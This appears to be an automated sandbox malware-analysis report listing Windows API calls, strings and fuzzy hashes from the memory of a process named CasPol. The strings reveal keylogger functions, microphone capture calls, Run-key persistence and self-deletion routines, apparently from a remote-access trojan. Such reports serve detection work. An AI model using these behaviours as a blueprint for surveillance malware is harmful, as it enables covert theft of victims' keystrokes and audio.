                                                                                                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B49,?,00000050,?,?,?,?,?), ref: 004509C9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ACP$OCP
                                                                                                            • API String ID: 0-711371036
                                                                                                            • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                            • Instruction ID: 0ee4350655218b6c75cd3052c0190142cf4d5733969cac988e1a0851f3347a37
                                                                                                            • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                            • Instruction Fuzzy Hash: 832148EBA00100A6F7308F55C801B9773AAAB90B23F564426EC49D730BF73ADE08C358
                                                                                                            APIs
                                                                                                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                            Strings
                                                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LocalTime
                                                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                                                            • API String ID: 481472006-1507639952
                                                                                                            • Opcode ID: 55e8a268f478e9dd55dcba40bfbb0b748b5ff50574cd289cd160118e090ea358
                                                                                                            • Instruction ID: 8fc2066b5dd234cef981570443e677007340a491061b3c72667858eadfbc0999
                                                                                                            • Opcode Fuzzy Hash: 55e8a268f478e9dd55dcba40bfbb0b748b5ff50574cd289cd160118e090ea358
                                                                                                            • Instruction Fuzzy Hash: EF2129A1A042806BC310FB6A980676B7B9457D1315F48417EF948532E2EB3C5999CB9F
                                                                                                            APIs
                                                                                                            • GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LocalTime
                                                                                                            • String ID: | $%02i:%02i:%02i:%03i
                                                                                                            • API String ID: 481472006-2430845779
                                                                                                            • Opcode ID: d3ffcd1d0ca88ff003ebf63de90cbb52a1477b8a5ce084a0fda1429b811f37a5
                                                                                                            • Instruction ID: f196d4ed1927782274832919bda13c77b2b6189c6c06a517aeeeb96a95a688aa
                                                                                                            • Opcode Fuzzy Hash: d3ffcd1d0ca88ff003ebf63de90cbb52a1477b8a5ce084a0fda1429b811f37a5
                                                                                                            • Instruction Fuzzy Hash: 81114C725082045AC704EBA5D8568AF73E8EB94708F10053FFC85931E1EF38DA84C69E
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                            • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                            • String ID: Online Keylogger Stopped
                                                                                                            • API String ID: 1623830855-1496645233
                                                                                                            • Opcode ID: 441e50180230ba2ba05f386e367c5a536ce2e77025d1c3492b7828fca42d8fe8
                                                                                                            • Instruction ID: 9ca866747e1af720c58b6b078daeda0145c7b5fd7bd766bf2ea1503866da158c
                                                                                                            • Opcode Fuzzy Hash: 441e50180230ba2ba05f386e367c5a536ce2e77025d1c3492b7828fca42d8fe8
                                                                                                            • Instruction Fuzzy Hash: 8101D431A043019BDB25BB35C80B7AEBBB19B45315F40407FE481275D2EB7999A6C3DB
                                                                                                            APIs
                                                                                                            • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B90,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                                            • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: wave$BufferHeaderPrepare
                                                                                                            • String ID: T=G
                                                                                                            • API String ID: 2315374483-379896819
                                                                                                            • Opcode ID: 8fbe103bd9222016c2b4e2bc3eb0eb996b4ad057f7b910ac6b5a0adda4e0e2aa
                                                                                                            • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                                            • Opcode Fuzzy Hash: 8fbe103bd9222016c2b4e2bc3eb0eb996b4ad057f7b910ac6b5a0adda4e0e2aa
                                                                                                            • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                                            APIs
                                                                                                            • IsValidLocale.KERNEL32(00000000,z=D,00000000,00000001,?,?,00443D7A,?,?,?,?,00000004), ref: 004477EC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LocaleValid
                                                                                                            • String ID: IsValidLocaleName$z=D
                                                                                                            • API String ID: 1901932003-2791046955
                                                                                                            • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                            • Instruction ID: b87742f2873dd73c0a7d5aade023b210d3410e3306d67f57874115e62e910f2b
                                                                                                            • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                            • Instruction Fuzzy Hash: 72F0E930A45318F7DA106B659C06F5E7B54CF05711F50807BFD046A283CE796D0285DC
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog
                                                                                                            • String ID: T=G$T=G
                                                                                                            • API String ID: 3519838083-3732185208
                                                                                                            • Opcode ID: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
                                                                                                            • Instruction ID: f0e76400c825ed045590d0aed9209fb7c3a86c2d0af9b05bbbbea7315d156e8c
                                                                                                            • Opcode Fuzzy Hash: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
                                                                                                            • Instruction Fuzzy Hash: 77F0E971A00221ABC714BB65C80569EB774EF4136DF10827FB416B72E1CBBD5D04D65D
                                                                                                            APIs
                                                                                                            • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                              • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                              • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                              • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                              • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                              • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                            • String ID: [AltL]$[AltR]
                                                                                                            • API String ID: 2738857842-2658077756
                                                                                                            • Opcode ID: 3060760f9439b7e306d49c13d8f75930fa0495ce116598ddfd2946cd15ffa226
                                                                                                            • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                                            • Opcode Fuzzy Hash: 3060760f9439b7e306d49c13d8f75930fa0495ce116598ddfd2946cd15ffa226
                                                                                                            • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00448835
                                                                                                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFreeHeapLast_free
                                                                                                            • String ID: `@$`@
                                                                                                            • API String ID: 1353095263-20545824
                                                                                                            • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                            • Instruction ID: fd413ccac38a9f67c3de8d393d9e933a11814297f80871467d1a397382efd299
                                                                                                            • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                            • Instruction Fuzzy Hash: 4DE06D371006059F8720DE6DD400A86B7E5EF95720720852AE89DE3710D731E812CB40
                                                                                                            APIs
                                                                                                            • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: State
                                                                                                            • String ID: [CtrlL]$[CtrlR]
                                                                                                            • API String ID: 1649606143-2446555240
                                                                                                            • Opcode ID: 5e7418163892c1745ec9138d14110a374d5f1712bd724f4894496e05d56ee1c7
                                                                                                            • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                                            • Opcode Fuzzy Hash: 5e7418163892c1745ec9138d14110a374d5f1712bd724f4894496e05d56ee1c7
                                                                                                            • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                                                            • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                                                            Strings
                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DeleteOpenValue
                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                            • API String ID: 2654517830-1051519024
                                                                                                            • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                            • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                            • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                            • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DeleteDirectoryFileRemove
                                                                                                            • String ID: pth_unenc
                                                                                                            • API String ID: 3325800564-4028850238
                                                                                                            • Opcode ID: b9b9920c625181ca6de104178518fd5ce2cfe10458045dbf61cc06549d32ecb0
                                                                                                            • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                                                            • Opcode Fuzzy Hash: b9b9920c625181ca6de104178518fd5ce2cfe10458045dbf61cc06549d32ecb0
                                                                                                            • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                                                            APIs
                                                                                                            • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                            • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ObjectProcessSingleTerminateWait
                                                                                                            • String ID: pth_unenc
                                                                                                            • API String ID: 1872346434-4028850238
                                                                                                            • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                            • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                                                            • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                            • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FB04
                                                                                                            • GetLastError.KERNEL32 ref: 0043FB12
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB6D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1717984340-0
                                                                                                            • Opcode ID: 87fd12a014d32a69e1321f94067b17621f6fc27d46547f6ea495f007f72d0054
                                                                                                            • Instruction ID: 94dc36b571f96c0084dd62d2177e44ea0606df48237064e9d41db09688609199
                                                                                                            • Opcode Fuzzy Hash: 87fd12a014d32a69e1321f94067b17621f6fc27d46547f6ea495f007f72d0054
                                                                                                            • Instruction Fuzzy Hash: 66413870E00206AFCF219F64C854A6BF7A9EF09320F1451BBF8585B2A1E738AC09C759